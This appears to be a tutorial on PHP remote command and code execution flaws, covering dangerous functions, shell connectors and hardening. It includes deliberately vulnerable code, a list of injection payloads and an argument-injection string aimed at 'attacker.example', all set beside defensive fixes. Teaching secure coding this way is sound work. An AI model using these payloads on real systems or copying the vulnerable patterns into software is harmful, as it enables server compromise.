Command execution (RCE) vulnerability
2022-06-29 19:58:00 【The way to remedy】
A brief introduction to RCE
RCE (remote command/code execution): remote command or remote code execution.
Command execution vulnerability: the application passes attacker-influenced input to a function that invokes operating system commands directly.
Code execution vulnerability: the application executes attacker-influenced script code (PHP here), and that code can in turn invoke operating system commands.
Cause: for flexibility and brevity, web developers sometimes call code-execution or command-execution functions directly from application code. When an application hands a string to a function that turns it into code, without considering whether a user can control that string, the result is a code execution vulnerability. When a user-controlled string reaches a function that runs system commands, the result is a command execution vulnerability.
Principle
The attacker reaches a point in the application where system commands are executed and supplies malicious command text. Because the server does not strictly validate or filter the input before it is passed to the execution function, the server runs the attacker's command, which is a direct compromise of the server.
The difference between command execution and code execution: a command execution vulnerability invokes operating system commands directly; a code execution vulnerability executes script code, which can then invoke operating system commands (for example, injected PHP that calls system()).
Command execution
System command execution functions (PHP)
system(): runs an external program and prints its output directly. Prototype: system(string $command, int &$return_var), where $command is the command to run and $return_var receives the exit status of the command. The return value is the last line of the output.
exec(): runs an external program. Prototype: exec(string $command, array &$output, int &$return_var), where $command is the command to run, $output receives each line of the command's output as an array element, and $return_var receives the exit status. exec() prints nothing itself and returns only the last line of output.
passthru(): runs a UNIX system command and passes its raw output straight through. When the command's output is binary data (an image, an archive) that must be returned to the browser unmodified, passthru() is used in place of system() and exec(). Prototype: passthru(string $command, int &$return_var),
where $command is the command to run and $return_var receives the exit status.
shell_exec(): runs a shell command and returns its complete output as a string. Prototype: shell_exec(string $command), where $command is the command to run. The backtick operator (`command`) is equivalent to shell_exec(). Other functions that spawn processes and must be treated the same way: popen(), proc_open(), pcntl_exec().
Command connectors
These characters let an attacker append a second command to the one the application intended to run. Their meaning differs slightly between Windows and Linux shells.
Windows (cmd.exe)
"|": pipes the standard output of the first command into the second; the second command runs regardless of how the first one finished. Example: ping 127.0.0.1 | whoami (whoami ignores its input and runs anyway).
"||": runs the following command only if the preceding one failed (non-zero exit status). Example: ping 127.0.0.1 || whoami.
"&": runs both commands one after the other, whether the first succeeded or failed. Example: ping 127.0.0.1 & whoami.
"&&": runs the following command only if the preceding one succeeded (exit status 0). Example: ping 127.0.0.1 && whoami.
Linux (sh/bash)
";": runs the following command after the preceding one finishes, regardless of its result. Example: ping 127.0.0.1; whoami.
"|": pipes the standard output of the first command into the second; the second command runs regardless of the first one's result. Example: ping 127.0.0.1 | whoami.
"||": runs the following command only if the preceding one failed. Example: ping 1 || whoami (the ping fails, so whoami runs).
"&": puts the preceding command in the background and immediately runs the following one, regardless of the first one's result. Example: ping 127.0.0.1 & whoami.
"&&": runs the following command only if the preceding one succeeded (exit status 0). Example: ping 127.0.0.1 && whoami.
Command substitution also executes: on Linux, `whoami` or $(whoami) embedded anywhere in the argument runs whoami even without a separator, so filtering separators alone is not sufficient.
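The following added example (written for this page, not code from the original post) ties the PHP functions above to the connector table. It builds the classic "ping a host" feature two ways: the vulnerable string concatenation that lets every connector through, and a validate-then-escape version. It assumes a Linux host with ping and whoami on the PATH; the function names and the payload list are constructed for illustration.

```php
<?php
// Added example: command injection through shell connectors, and the
// validate-then-escape pattern that prevents it. Assumes Linux (sh) with
// ping and whoami on PATH. Function and parameter names are made up.

// VULNERABLE: the user value is pasted straight into the command string,
// so every connector in the table above (; | || && &) and command
// substitution (`...`, $(...)) are interpreted by the shell.
function buildPingCommandVulnerable(string $host): string
{
    return 'ping -c 1 ' . $host;
}

// HARDENED: reject anything that is not an IP address or a plain hostname,
// then quote the value so the shell treats it as a single literal argument.
function buildPingCommandSafe(string $host): string
{
    $isIp = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $labels = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    $isHostname = (bool) preg_match("/^{$labels}(?:\\.{$labels})*$/", $host);
    if (!$isIp && !$isHostname) {
        throw new InvalidArgumentException('rejected host value: ' . $host);
    }
    // escapeshellarg() wraps the value in single quotes and escapes any
    // embedded single quotes, so separators inside it are just characters.
    return 'ping -c 1 ' . escapeshellarg($host);
}

// Constructed attacker inputs, one per connector from the Linux table.
$payloads = [
    '127.0.0.1; whoami',
    '127.0.0.1 | whoami',
    '1 || whoami',
    '127.0.0.1 && whoami',
    '127.0.0.1 & whoami',
];

foreach ($payloads as $p) {
    echo "input: $p\n";
    $cmd = buildPingCommandVulnerable($p);
    echo "  vulnerable command: $cmd\n";
    // exec() collects every output line into $out and the exit status into
    // $rc; the extra line produced by whoami is the injected result.
    $out = [];
    exec($cmd . ' 2>&1', $out, $rc);
    echo "  exit=$rc, last output line: " . end($out) . "\n";
    try {
        buildPingCommandSafe($p);
    } catch (InvalidArgumentException $e) {
        echo '  safe builder: ' . $e->getMessage() . "\n";
    }
}

// The safe builder accepts legitimate values and quotes them.
echo buildPingCommandSafe('127.0.0.1'), "\n";
echo buildPingCommandSafe('example.com'), "\n";
```

The validation step matters as much as the quoting: escapeshellarg() alone would still let an attacker pass an arbitrary string as ping's destination argument, which is harmless for ping but not for every program.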
Code execution
Script code execution functions (PHP)
eval(): executes a string as PHP code. If the code does not execute a return statement, eval() returns NULL. On a parse error PHP 5 returned false; since PHP 7 a ParseError exception is thrown instead.
assert(): in PHP 5 and 7.x, a string passed to assert() is evaluated as PHP code, so assert($userInput) is equivalent to eval($userInput). String assertions were deprecated in PHP 7.2 and removed in PHP 8.0.
preg_replace(): with the /e modifier, the replacement string is evaluated as PHP code after the match substitution, so a user-controlled replacement or pattern becomes code execution. The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0 (preg_replace_callback() replaces it).
call_user_func(), call_user_func_array(), array_map(), usort() and other functions that take a callback: if the callback name comes from user input, the attacker chooses which function is called, for example system with an attacker-chosen argument.
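An added example (not from the original post) of the code-execution sinks above fed by user input, next to an allowlist dispatch that keeps the same feature without evaluating user text. The "calculator" feature, the operation table and the function names are invented for illustration; the abusive input calls system('echo injected') rather than anything destructive.

```php
<?php
// Added example: PHP code-execution sinks reached by user input, and an
// allowlist dispatch that offers the same feature safely. The calculator
// feature, ALLOWED_OPS and the function names are invented.

// VULNERABLE: a "calculator" that evaluates the user's expression. eval()
// treats the whole string as PHP, so a function call is as acceptable to
// it as arithmetic. (assert($string) in PHP < 8 and preg_replace() with
// the /e modifier in PHP < 7 are the same sink under other names.)
function calcVulnerable(string $expression)
{
    return eval('return ' . $expression . ';');
}

// VULNERABLE: the callback name comes from the user, so call_user_func()
// will invoke system(), passthru(), etc. with a user-supplied argument.
function applyVulnerable(string $op, string $value)
{
    return call_user_func($op, $value);
}

// HARDENED: only pre-declared operations are reachable, and the lookup is
// an exact key match, so the user never names a PHP function directly.
const ALLOWED_OPS = [
    'upper'   => 'strtoupper',
    'lower'   => 'strtolower',
    'reverse' => 'strrev',
];

function applySafe(string $op, string $value): string
{
    if (!array_key_exists($op, ALLOWED_OPS)) {
        throw new InvalidArgumentException("unknown operation: $op");
    }
    return call_user_func(ALLOWED_OPS[$op], $value);
}

// Constructed inputs: what the developer expected, then what the same
// sink does with an attacker-chosen function name.
echo calcVulnerable('1 + 2'), "\n";
echo calcVulnerable('phpversion()'), "\n";

echo applyVulnerable('strtoupper', 'hello'), "\n";
echo applyVulnerable('system', 'echo injected'), "\n";

// The allowlisted version serves the feature and refuses everything else.
echo applySafe('upper', 'hello'), "\n";
try {
    applySafe('system', 'id');
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```

The allowlist is a map from user-visible names to functions rather than a list of function names, so even a "valid" PHP function name supplied by the user (system, exec) is not a key and is rejected.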
Defense
Quote every parameter value: pass each argument through escapeshellarg() so the shell treats it as a single literal string.
Before calling a function dynamically, check that its name is in an allowlist of the functions the code is expected to call.
Before a parameter reaches a command execution function or method, validate it (for example with filter_var() or a strict regular expression) and escape shell metacharacters.
Work that can be done in the script itself should not be delegated to external programs. Use command execution functions as little as possible, and disable the ones that are not needed through disable_functions in php.ini.
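An added example (not from the original post) of two points a practitioner checks when applying these defenses: that escapeshellcmd() is not a substitute for escapeshellarg(), because it still allows argument injection, and how to see at runtime which of the functions listed on this page are still callable under the current disable_functions setting. It assumes Linux, where escapeshellarg() produces single-quoted strings; the curl-based fetch feature and the function names are invented.

```php
<?php
// Added example: escapeshellcmd() vs escapeshellarg(), validate-first, and
// a runtime check of disable_functions. Assumes Linux; the fetch feature
// and function names are invented for illustration.

// escapeshellcmd() neutralises shell metacharacters (; | & ` $ and so on)
// but leaves spaces and leading dashes untouched, so the attacker can still
// append extra ARGUMENTS to the program. For curl, an added "-o <path>"
// is a file-write primitive; for other tools extra flags may run programs.
function fetchWithEscapeshellcmd(string $url): string
{
    return escapeshellcmd('curl -s ' . $url);
}

// escapeshellarg() makes the value one literal argument: the spaces stay
// inside the quotes and curl receives a single (invalid) URL, not options.
function fetchWithEscapeshellarg(string $url): string
{
    return 'curl -s ' . escapeshellarg($url);
}

// Validate first, escape second: the value should also match the shape the
// feature expects. Here only http(s) URLs are accepted.
function validateUrl(string $url): string
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (filter_var($url, FILTER_VALIDATE_URL) === false
        || !in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException('not an http(s) URL: ' . $url);
    }
    return $url;
}

// Which of the dangerous functions from this page can still be called in
// this interpreter? Covers both PHP 7 (function_exists() is true for a
// disabled function) and PHP 8 (disabled functions no longer exist).
function stillEnabledExecFunctions(): array
{
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    $dangerous = ['system', 'exec', 'passthru', 'shell_exec', 'popen',
                  'proc_open', 'pcntl_exec', 'assert'];
    $enabled = [];
    foreach ($dangerous as $fn) {
        if (function_exists($fn) && !in_array($fn, $disabled, true)) {
            $enabled[] = $fn;
        }
    }
    return $enabled;
}

// Constructed attacker input: a URL followed by an extra curl option.
$payload = 'http://attacker.example/x -o /tmp/injected.txt';
echo fetchWithEscapeshellcmd($payload), "\n";   // -o survives as an option
echo fetchWithEscapeshellarg($payload), "\n";   // whole value is one argument
try {
    validateUrl($payload);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
echo fetchWithEscapeshellarg(validateUrl('https://example.com/')), "\n";

echo 'still enabled: ', implode(', ', stillEnabledExecFunctions()), "\n";
```

Run the last check on the production php.ini rather than the developer's: disable_functions is per-interpreter configuration, and a function disabled in the CLI may still be enabled under php-fpm.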